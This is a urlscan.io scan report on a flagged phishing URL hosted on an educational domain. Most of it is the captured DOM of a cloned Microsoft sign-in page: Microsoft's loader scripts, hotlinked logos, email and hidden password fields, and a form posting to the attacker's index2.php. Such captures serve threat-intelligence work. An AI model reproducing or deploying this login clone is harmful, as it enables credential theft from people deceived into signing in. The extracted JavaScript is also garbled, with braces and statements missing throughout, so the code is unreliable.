iplc.edu.ph Open in urlscan Pro  Malicious Activity! Public Scan

Submitted URL: https://iplc.edu.ph/officenewlevel/office
Effective URL: https://iplc.edu.ph/officenewlevel/office/8hdjrmeni358cqecsm26qa88.php?6DJDb316824578576e3490d70dffc44cf205db96b23e9...
Submission: On April 25 via automatic, source links-suspicious — Scanned from DE

Form analysis 1 forms found in the DOM

Name: Form1POST index2.php?h=ed29nkjpsa16bhrjq4na16owq-1mucgfycc664m7vmhpjgqse65-1l5rurej3h44qodo5rn0cdvyn-8om6v2ckrxsbnwf40t9ta8a7e-34tiets5jpj294jd59h8c4s0n-28w7d5j2k2jtil9ncckolke4m-9jzlwicvu376y9q4vjq77y5ks-1m0whdrwis44c1hoa9mrwhlt4-1uvutm1mpyov7rqhtcf8fksby-aac54ic1fmca5xz1yvc5t9nfe-1hn40w0bomeivihj9lopp4hp2-c0121povror81d0xao0yez4gy

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    ! function() {
      var e = window,
        r = e.$Debug = e.$Debug || {},
        t = e.$Config || {};
      if (!r.appendLog) {
        var n = [],
          o = 0;
        r.appendLog = function(e) {
          var r = t.maxDebugLog || 25,
            a = (new Date).toUTCString() + ":" + e;
          n.push(o + ":" + a), n.length > r && n.shift(), o++
        }, r.getLogs = function() {
          return n
    function() {
      function e(e, r) {
        function t(a) {
          var i = e[a];
          return n - 1 > a ? void(o.r[i] ? t(a + 1) : o.when(i, function() {
            t(a + 1)
          })) : void r(i)
        var n = e.length;

      function r(e, r, a) {
        function i() {
          var e = !!s.method,
            o = e ? s.method : a[0],
            i = s.extraArgs || [],
            u = n.$WebWatson;
          try {
            var c = t(a, !e);
            if (i && i.length > 0) {
              for (var l = i.length, d = 0; l > d; d++) {
            o.apply(r, c)
          } catch (f) {
            return void(u && u.submitFromException && u.submitFromException(f))
        var s = o.r && o.r[e];
        return r = r ? r : this, s && (s.skipTimeout ? i() : n.setTimeout(i, 0)), s

      function t(e, r) {
        return Array.prototype.slice.call(e, r ? 1 : 0)
      var n = window;
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        "q": [],
        "r": [],
        "removeItems": [],
        "lock": 0,
        "o": []
      var o = n.$Do;
      o.when = function(t, n) {
        function a(e) {
          r(e, i, s) || o.q.push({
            "id": e,
            "c": i,
            "a": s
        var i = 0,
          s = [],
          u = 1,
          c = "function" == typeof n;
        c || (i = n, u = 2);
        for (var l = u; l < arguments.length; l++) {
        t instanceof Array ? e(t, a) : a(t)
      }, o.register = function(e, t, n) {
        if (!o.r[e]) {
          var a = {};
          if (t && (a.method = t), n && (a.skipTimeout = n), arguments && arguments.length > 3) {
            a.extraArgs = [];
            for (var i = 3; i < arguments.length; i++) {
          o.r[e] = a, o.lock++;
          try {
            for (var s = 0; s < o.q.length; s++) {
              var u = o.q[s];
              u.id == e && r(e, u.c, u.a) && o.removeItems.push(u)
          } catch (c) {
            throw c
          } finally {
            if (o.lock--, 0 === o.lock) {
              for (var l = 0; l < o.removeItems.length; l++) {
                for (var d = o.removeItems[l], f = 0; f < o.q.length; f++) {
                  if (o.q[f] === d) {
                    o.q.splice(f, 1);
              o.removeItems = []
      }, o.unregister = function(e) {
        o.r[e] && delete o.r[e]
    function() {
      function e(e, r) {
        var t = f.$Debug;
        t && t.appendLog && (r && (e += " '" + (r.src || r.href || "") + "'", e += ", id:" + (r.id || ""), e += ", async:" + (r.async || ""), e += ", defer:" + (r.defer || "")), t.appendLog(e))

      function r() {
        if (void 0 === d) {
          if (g) {
            d = g.IE
          } else {
            var e = f.navigator.userAgent;
            d = -1 !== e.indexOf("MSIE ") || -1 !== e.indexOf("Trident/")
        return d

      function t() {
        var e = f.$Config || {},
          r = e.loader || {};
        return r.slReportFailure || e.slReportFailure || !1

      function n() {
        var e = f.$Config || {},
          r = e.loader || {};
        return r.redirectToErrorPageOnLoadFailure || !1

      function o(e) {
        var r = e.indexOf("?"),
          t = r > -1 ? r : e.length;
        return t > p && e.substr(t - p, p).toLowerCase() === v

      function a(e) {
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          t = null;
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      function i(e) {
        var r = h.createElement("link");
        return r.rel = "stylesheet", r.type = "text/css", r.href = e, r

      function s(e) {
        var r = h.createElement("script");
        return r.type = "text/javascript", r.src = e, r.defer = !1, r.async = !1, r

      function u(e, r) {
        var t = h.createElement(r);
        return t.src = e, t

      function c(e) {
        var r = !0,
          t = e.src || e.href || "";
        if (t) {
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            try {
              e.sheet && e.sheet.cssRules && !e.sheet.cssRules.length && (r = !1)
            } catch (n) {}
        } else {
          r = !1
        return r

      function l() {
        function r(e) {
          if (!(s && s.length > 1)) {
            return e
          for (var r = 0; r < s.length; r++) {
            if (0 === e.indexOf(s[r])) {
              return s[r + 1 < s.length ? r + 1 : 0] + e.substring(s[r].length)
          return e

        function t(n, i, s) {
          if (n < d.length) {
            var f = d[n];
            if (!f || !f.srcPath) {
              return void t(n + 1, i, s)
            f.retry > 0 && (f.srcPath = r(f.srcPath), f.origId || (f.origId = f.id), f.id = f.origId + "_Retry_" + f.retry);
            var g = a(f),
              v = function() {
                e("[$Loader]: " + (u.failMessage || "Failed"), g), f.retry < o && (f.retry++, t(n, i, s), l._ReportFailure(f.retry - 1, f.srcPath)), s && s()
              p = function() {
                if (f.retry++, c(g)) {
                  e("[$Loader]: " + (u.successMessage || "Loaded"), g), t(n + 1, i, s);
                  var r = f.onSuccess;
                  "function" == typeof r && r(f.srcPath)
                } else {
            g.onload = p, g.onerror = v, g.onreadystatechange = function() {
              "loaded" === g.readyState ? setTimeout(p, 500) : "complete" === g.readyState && p()
            var y = h.getElementsByTagName("head")[0];
            y.appendChild(g), e("[$Loader]: Loading '" + (f.srcPath || "") + "', id:" + (f.id || ""))
          } else {
            i && i()
        var n = f.$Config || {},
          o = n.slMaxRetry || 2,
          i = n.loader || {},
          s = i.cdnRoots || [],
          u = this,
          d = [];
        u.retryOnError = !0, u.successMessage = "Loaded", u.failMessage = "Error", u.Add = function(e, r, t, n, o, a) {
          e && d.push({
            "srcPath": e,
            "id": r,
            "retry": n || 0,
            "integrity": t,
            "tagName": o || "script",
            "onSuccess": a
        }, u.AddLoaded = function() {}, u.AddForReload = function(e, r) {
          var t = e.src || e.href || "";
          u.Add(t, "AddForReload", e.integrity, 1, e.tagName, r)
        }, u.AddIf = function(e, r, t) {
          e && u.Add(r, t)
        }, u.Load = function(e, r) {
          t(0, e, r)
      var d, f = window,
        g = f.$B,
        h = f.document,
        v = ".css",
        p = v.length;
      l.On = function(e, r, t) {
        if (!e) {
          throw "The target element must be provided and cannot be null."
        r ? l.OnError(e, t) : l.OnSuccess(e, t)
      }, l.OnSuccess = function(r, o) {
        var a = r.src || r.href || "",
          i = t(),
          s = n();
        if (!r) {
          throw "The target element must be provided and cannot be null."
        if (c(r)) {
          e("[$Loader]: Loaded", r);
          var u = new l;
          u.failMessage = "Reload Failed", u.successMessage = "Reload Success", u.AddLoaded(r), u.Load(null, function() {
            if (i) {
              throw "Unexpected state. resourceLoader.Load() failed despite initial load success. ['" + a + "']"
            s && (document.location.href = "/error.aspx?err=504")
        } else {
          l.OnError(r, o)
      }, l.OnError = function(r, o) {
        var a = r.src || r.href || "",
          i = t(),
          s = n();
        if (!r) {
          throw "The target element must be provided and cannot be null."
        e("[$Loader]: Failed", r);
        var u = new l;
        u.failMessage = "Reload Failed", u.successMessage = "Reload Success", u.AddForReload(r, o), u.Load(null, function() {
          if (i) {
            throw "Failed to load external resource ['" + a + "']"
          s && (document.location.href = "/error.aspx?err=504")
        }), l._ReportFailure(0, a)
      }, l._ReportFailure = function(e, t) {
        if (!r()) {
          throw "[Retry " + e + "] Failed to load external resource ['" + t + "'], reloading from fallback CDN endpoint"
      }, f.$Loader = l
    function() {
      function e() {
        if (!$) {
          var e = new v.$Loader;
          e.AddIf(!v.jQuery, y.sbundle, "WebWatson_DemandSupport"), y.sbundle = null, delete y.sbundle, e.AddIf(!v.$Api, y.fbundle, "WebWatson_DemandFramework"), y.fbundle = null, delete y.fbundle, e.Add(y.bundle, "WebWatson_DemandLoaded"), e.Load(r,
            t), $ = !0

      function r() {
        if (v.$WebWatson) {
          if (v.$WebWatson.isProxy) {
            return void t()
          m.when("$WebWatson.full", function() {
            for (; b.length > 0;) {
              var e = b.shift();
              e && v.$WebWatson[e.cmdName].apply(v.$WebWatson, e.args)

      function t() {
        var e = v.$WebWatson ? v.$WebWatson.isProxy : !0;
        if (e) {
          if (!w && JSON) {
            try {
              var r = new XMLHttpRequest;
              r.open("POST", y.url), r.setRequestHeader("Accept", "application/json"), r.setRequestHeader("Content-Type", "application/json; charset=UTF-8"), r.setRequestHeader("canary", p.apiCanary), r.setRequestHeader("client-request-id", p
                .correlationId), r.setRequestHeader("hpgid", p.hpgid || 0), r.setRequestHeader("hpgact", p.hpgact || 0);
              for (var t = -1, o = 0; o < b.length; o++) {
                if ("submit" === b[o].cmdName) {
                  t = o;
              var a = b[t] ? b[t].args || [] : [],
                i = {
                  "sr": y.sr,
                  "ec": "Failed to load external resource [Core Watson files]",
                  "wec": 55,
                  "idx": 1,
                  "pn": p.pgid || "",
                  "sc": p.scid || 0,
                  "hpg": p.hpgid || 0,
                  "msg": "Failed to load external resource [Core Watson files]",
                  "url": a[1] || "",
                  "ln": 0,
                  "ad": 0,
                  "an": !1,
                  "cs": "",
                  "sd": p.serverDetails,
                  "ls": null,
                  "diag": h(y)
            } catch (s) {}
            w = !0
          y.loadErrorUrl && window.location.assign(y.loadErrorUrl)

      function n() {
        b = [], v.$WebWatson = null

      function o(r) {
        return function() {
          var t = arguments;
            "cmdName": r,
            "args": t
          }), e()

      function a() {
        var e = ["foundException", "resetException", "submit"],
          r = this;
        r.isProxy = !0;
        for (var t = e.length, n = 0; t > n; n++) {
          var a = e[n];
          a && (r[a] = o(a))

      function i(e, r, t, n, o, a, i) {
        var s = v.event;
        return a || (a = d(o || s, i ? i + 2 : 2)), v.$Debug && v.$Debug.appendLog && v.$Debug.appendLog("[WebWatson]:" + (e || "") + " in " + (r || "") + " @ " + (t || "??")), W.submit(e, r, t, n, o || s, a, i)

      function s(e, r) {
        return {
          "signature": e,
          "args": r,
          "toString": function() {
            return this.signature

      function u(e) {
        for (var r = [], t = e.split("\n"), n = 0; n < t.length; n++) {
          r.push(s(t[n], []))
        return r

      function c(e) {
        for (var r = [], t = e.split("\n"), n = 0; n < t.length; n++) {
          var o = s(t[n], []);
          t[n + 1] && (o.signature += "@" + t[n + 1], n++), r.push(o)
        return r

      function l(e) {
        if (!e) {
          return null
        try {
          if (e.stack) {
            return u(e.stack)
          if (e.error) {
            if (e.error.stack) {
              return u(e.error.stack)
          } else {
            if (window.opera && e.message) {
              return c(e.message)
        } catch (r) {}
        return null

      function d(e, r) {
        var t = [];
        try {
          for (var n = arguments.callee; r > 0;) {
            n = n ? n.caller : n, r--
          for (var o = 0; n && L > o;) {
            var a = "InvalidMethod()";
            try {
              a = n.toString()
            } catch (i) {}
            var u = [],
              c = n.args || n.arguments;
            if (c) {
              for (var d = 0; d < c.length; d++) {
                u[d] = c[d]
            t.push(s(a, u)), n = n.caller, o++
        } catch (i) {
          t.push(s(i.toString(), []))
        var f = l(e);
        return f && (t.push(s("--- Error Event Stack -----------------", [])), t = t.concat(f)), t

      function f(e) {
        if (e) {
          try {
            var r = /function (.{1,})\(/,
              t = r.exec(e.constructor.toString());
            return t && t.length > 1 ? t[1] : ""
          } catch (n) {}
        return ""

      function g(e) {
        if (e) {
          try {
            if ("string" != typeof e && JSON && JSON.stringify) {
              var r = f(e),
                t = JSON.stringify(e);
              return t && "{}" !== t || (e.error && (e = e.error, r = f(e)), t = JSON.stringify(e), t && "{}" !== t || (t = e.toString())), r + ":" + t
          } catch (n) {}
        return "" + (e || "")

      function h(e) {
        var r = [];
        try {
          if (jQuery ? (r.push("jQuery v:" + jQuery().jquery), r.push(jQuery.easing ? "jQuery.easing:" + JSON.stringify(jQuery.easing) : "jQuery.easing is not defined")) : r.push("jQuery is not defined"), e && e.expectedVersion && r.push(
              "Expected jQuery v:" + e.expectedVersion), m) {
            var t, n = "";
            for (t = 0; t < m.o.length; t++) {
              n += m.o[t] + ";"
            for (r.push("$Do.o[" + n + "]"), n = "", t = 0; t < m.q.length; t++) {
              n += m.q[t].id + ";"
            r.push("$Do.q[" + n + "]")
          if (v.$Debug && v.$Debug.getLogs) {
            var o = v.$Debug.getLogs();
            o && o.length > 0 && (r = r.concat(o))
          if (b) {
            for (var a = 0; a < b.length; a++) {
              var i = b[a];
              if (i && "submit" === i.cmdName) {
                try {
                  if (JSON && JSON.stringify) {
                    var s = JSON.stringify(i);
                    s && r.push(s)
                } catch (u) {
        } catch (c) {
        return r
      var v = window,
        p = v.$Config || {},
        y = p.watson,
        m = v.$Do;
      if (!v.$WebWatson && y) {
        var b = [],
          $ = !1,
          w = !1,
          L = 10,
          W = v.$WebWatson = new a;
        W.CB = {}, W._orgErrorHandler = v.onerror, v.onerror = i, W.errorHooked = !0, m.when("jQuery.version", function(e) {
          y.expectedVersion = e
        }), m.register("$WebWatson")
    function() {
      function e(e, r) {
        for (var t = r.split("."), n = t.length, o = 0; n > o && null !== e && void 0 !== e;) {
          e = e[t[o++]]
        return e

      function r(r) {
        var t = null;
        return null === u && (u = e(a, "Constants")), null !== u && r && (t = e(u, r)), null === t || void 0 === t ? "" : t.toString()

      function t(t) {
        var n = null;
        return null === i && (i = e(a, "$Config.strings")), null !== i && t && (n = e(i, t.toLowerCase())), (null === n || void 0 === n) && (n = r(t)), null === n || void 0 === n ? "" : n.toString()

      function n(e, r) {
        var n = null;
        return e && r && r[e] && (n = t("errors." + r[e])), n || (n = t("errors." + e)), n || (n = t("errors." + c)), n || (n = t(c)), n

      function o(t) {
        var n = null;
        return null === s && (s = e(a, "$Config.urls")), null !== s && t && (n = e(s, t.toLowerCase())), (null === n || void 0 === n) && (n = r(t)), null === n || void 0 === n ? "" : n.toString()
      var a = window,
        i = null,
        s = null,
        u = null,
        c = "GENERIC_ERROR";
      a.GetString = t, a.GetErrorString = n, a.GetUrl = o
    function() {
      var e = window,
        r = e.$Config || {};
      e.$B = r.browser || {}
  <script type="text/javascript">
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    ! function() {
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        if (!i.allowFrame) {
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            l = s.indexOf("#"),
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            d = -1 === t || n && t > l ? "?" : "&";
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                    params: {
                        isChinaDc: svr.fIsChinaDc,
                        bannerLogoUrl: bannerLogoUrl() } }">
            <!--  --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
            <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" pngsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
              svgsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }"
              src="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div>
          <!-- /ko --><!-- ko if: svr.strLWADisclaimerMsg && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: asyncInitReady -->
          <div role="main" data-bind="component: { name: 'pagination-control',
                        publicMethods: paginationControlMethods,
                        params: {
                            enableCssAnimation: svr.fEnableCssAnimation,
                            disableAnimationIfAnimationEndUnsupported: svr.fDisableAnimationIfAnimationEndUnsupported,
                            initialViewId: initialViewId,
                            currentViewId: currentViewId,
                            initialSharedData: initialSharedData,
                            initialError: $loginPage.getServerError() },
                        event: {
                            cancel: paginationControl_onCancel,
                            showView: $loginPage.view_onShow,
                            setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                            animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->
            <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class=""><!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.sPOST_Username) --><!-- /ko -->
              <div class="pagination-view animate slide-in-next" data-bind="css: {
        'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.sPOST_Username),
        'zero-opacity': hidePaginatedView.hideSubView(),
        'animate': animate(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } -->
                <div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: 'login-paginated-username-view',
                        params: {
                            serverData: svr,
                            serverError: initialError,
                            isInitialView: isInitialState,
                            displayName: sharedData.displayName,
                            prefillNames: $loginPage.prefillNames,
                            flowToken: sharedData.flowToken },
                        event: {
                            refresh: $loginPage.view_onRefresh,
                            redirect: $loginPage.view_onRedirect,
                            setPendingRequest: $loginPage.view_onSetPendingRequest,
                            showLearnMore: $loginPage.learnMore_onShow,
                            registerDialog: $loginPage.view_onRegisterDialog,
                            unregisterDialog: $loginPage.view_onUnregisterDialog,
                            showDialog: $loginPage.view_onShowDialog } }"><!--  -->
                  <div data-bind="component: { name: 'header-control',
    params: {
        serverData: svr,
        title: str['WF_STR_HeaderDefault_Title'] } }">
                    <div class="row text-title" id="loginHeader">
                      <div role="heading" aria-level="1" data-bind="text: title">Sign in</div><!-- ko if: isSubtitleVisible --><!-- /ko -->
                  </div><!-- ko if: pageDescription && !svr.fHideLoginDesc --><!-- /ko -->
                  <div class="row">
                    <div role="alert" aria-live="assertive"><!-- ko if: usernameTextbox.error --><!-- /ko --> </div>
                    <div class="row">
                      <div role="alert" aria-live="assertive"><!-- ko if: usernameTextbox.error --><!-- /ko --> </div>
                      <div class="row">
                        <div class="form-group">
                          <div class="form-group col-md-24">
                            <input type="email" aria-label="Email, phone, or Skype" name="login" id="username" maxlength="113" class="form-control ltr_override" placeholder="Email, phone, or Skype" required="">
                        </div> <input name="passwd" type="password" id="i0118" autocomplete="off" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" class="moveOffScreen" tabindex="-1" aria-hidden="true">
                        <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko -->
                      </div><!-- /ko -->
                  <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons">
                    <div class="row">
                      <div class="col-md-24">
                        <div class="text-13 action-links"><!-- ko if: svr.fCBShowSignUp && !svr.fDoIfExists && !svr.fCheckProofForAliases -->
                          <div class="form-group" data-bind="
                    htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                    childBindings: {
                        'signup': {
                            href: svr.urlSignUp,
                            ariaLabel: str['WF_STR_SignupLink_AriaLabel_Text'],
                            attr: { name: 'createAccount' },
                            click: signup_onClick } }">No account?
                            <a href="https://login.live.com/oauth20_authorize.srf?response_type=code&amp;client_id=51483342-085c-4d86-bf88-cf50c7252078&amp;scope=openid+profile+email+offline_access&amp;response_mode=form_post&amp;redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&amp;state=rQIIAXVSPW_TUACMkza0FYIKIYHEEgkmRJJn-_njBVXUTe2SpLHjJqlrM0SuYycvH7brPCdpfgFjxdiRSiB1RAIhZqZOnSt-AEIMqBMbuOxIp1vuhtPdPc3QBbr0BLKQs4VDlEc2z-YhokHehgyfZzmWZxlAdznARvfW1h89jt9sXn_bPLv45Dz_8-7FKbXaGeGpW3CC8Tn1oE9IOCkVi7PZrBB4Hnb-CcXPFHVJUd8p6jS97Pr5dvM8PeFZAQCRQUiELE8zAhQK1rYM1IU-VwcmUY3qUC0DoDIVuGsofXMhEXUgAa21NVLH8rG2U4HqoDfTtuucZujEbA1nWuKvM_LxbqsHtR2dqIshsFpq3zT2R5rR5q7SdzUpJn3mhoIIL9zr9KoXRONOGEzIaeY9pYWuX-mWA993HVK4sbk-wY5NcOA3oiB0I4Ldyca2F7vzRsPRRU2R69K0WqlCaAm2VWbcjuXbLPbBHuc4yK4ETc2io6k5k7DuyQ1JPNozWKgg5IzbO2DfwTjoHNRwSF7ylaYnoPKg29R51YjN_hT0pKaBG3EX-vNefNQ76CuxLITHxodMNql1HPgXmTtJKB93c2EUeHjkXi5RP5Zug0xpZWVtPfUwlUv9XqLeLifLvYq_PvN_fqydnS3EVjWVulguKgrq2rq9deCoR7XWANbnoqKIMrG82uHYBErTYEccMwDtGtxAJfokS51ks7-y1OtbqS-r_9v6au1-8heUB2KCHGBKHCol5fwF0&amp;estsfed=1&amp;uaid=9275231bf24040dca3cab6633bffa63f&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;fci=4345a7b9-9a63-4910-a426-35363201d503&amp;mkt=en-US" id="signup" aria-label="Create a Microsoft account" name="createAccount">Create one!</a>
                          </div><!-- /ko --><!-- ko if: svr.showCantAccessAccountLink -->
                          <div class="form-group"> <a id="cantAccessAccount" name="cannotAccessAccount" href="#" data-bind="
                        text: str['WF_STR_CantAccessAccount_Text'],
                        click: cantAccessAccount_onClick">Can't access your account?</a> </div>
                          <!-- /ko --><!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.fShowForgotUsernameLink) --><!-- /ko --><!-- ko if: availableCredsWithoutUsername().length > 0 || svr.fShowForgotUsernameLink -->
                          <div class="form-group" data-bind="
                    component: { name: 'cred-switch-link-control',
                        params: {
                            serverData: svr,
                            availableCreds: availableCredsWithoutUsername(),
                            showForgotUsername: svr.fShowForgotUsernameLink },
                        event: {
                            switchView: noUsernameCredSwitchLink_onSwitchView,
                            redirect: onRedirect,
                            registerDialog: onRegisterDialog,
                            unregisterDialog: onUnregisterDialog,
                            showDialog: onShowDialog } }"><!--  -->
                            <div class="form-group"><!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) -->
                              <a id="idA_PWD_SwitchToCredPicker" href="#" data-bind="
        text: isUserKnown ? str['CT_PWD_STR_SwitchToCredPicker_Link'] : str['CT_PWD_STR_SwitchToCredPicker_Link_NoUser'],
        click: switchToCredPicker_onClick">Sign-in options</a><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko --> </div><!-- ko if: credLinkError --><!-- /ko -->
                          </div><!-- /ko -->
                    <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                      <div data-bind="component: { name: 'footer-buttons-field',
        params: {
            serverData: svr,
            isPrimaryButtonEnabled: !isRequestPending(),
            isPrimaryButtonVisible: svr.fShowButtons,
            isSecondaryButtonEnabled: true,
            isSecondaryButtonVisible: svr.fShowButtons &amp;&amp; isBackButtonVisible() },
        event: {
            primaryButtonClick: primaryButton_onClick,
            secondaryButtonClick: secondaryButton_onClick } }">
                        <div class="col-xs-24 no-padding-left-right button-container" data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { 'no-margin-bottom': removeBottomMargin }"><!-- ko if: isSecondaryButtonVisible --><!-- /ko -->
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            attr: primaryButtonAttributes,
            value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
            hasFocus: focusOnPrimaryButton,
            click: primaryButton_onClick,
            enable: isPrimaryButtonEnabled,
            visible: isPrimaryButtonVisible,
            preventTabbing: primaryButtonPreventTabbing" value="Next"> </div>
                  </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
                <!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko -->
          </div><!-- /ko -->
        </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSession --><!-- /ko --> <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value=""> <input type="hidden" name="psRNGCDefaultType"
          data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden" name="psRNGCSLK"
          data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value="FF9daQaBXcNqKTj4Mx8FF8EtZfKbmY0FSW3l52j0UK4=9:1"> <input type="hidden" name="ctx" data-bind="value: ctx"
        <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="2cc4755b-ec6e-4bb5-a3a3-7a38544a0000"> <input type="hidden" id="i0327" data-bind="attr: { name: svr.sFTName }, value: flowToken" name="flowToken"
        <input type="hidden" name="PPSX" data-bind="value: svr.sRandomBlob" value=""> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.sFoundMSAs" value=""> <input type="hidden" name="fspost"
          data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure"
          data-bind="value: svr.fShowCookieBanner ? 1 : 0" value="0"> <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="0">
        <div data-bind="component: { name: 'instrumentation-control',
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value=""> <input type="hidden" name="i18"
            data-bind="value: srsSuccess" value=""> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
        <div id="footer" class="footer default" role="contentinfo" data-bind="css: { 'default': !backgroundLogoUrl() }">
          <div data-bind="component: { name: 'footer-control',
                    params: {
                        serverData: svr,
                        debugDetails: debugDetails,
                        showLinks: true },
                    event: {
                        agreementClick: footer_agreementClick } }"><!--  --><!-- ko if: showLinks || impressumLink || showIcpLicense -->
            <div id="footerLinks" class="footerNode text-secondary">
              <a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="https://www.microsoft.com/en-US/servicesagreement/">Terms of use</a>
              <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="https://privacy.microsoft.com/en-US/privacystatement">Privacy &amp; cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --><!-- Set attr binding before hasFocus to prevent Narrator from losing focus -->
              <a href="#" role="button" class="moreOptions" data-bind="
        click: moreInfo_onClick,
        ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
        attr: { 'aria-expanded': showDebugDetails().toString(),
        hasFocus: focusMoreInfo() }" aria-label="Click here for troubleshooting information" aria-expanded="false"><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.png" svgsrc="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg" data-bind="imgSrc" src="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg"><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && 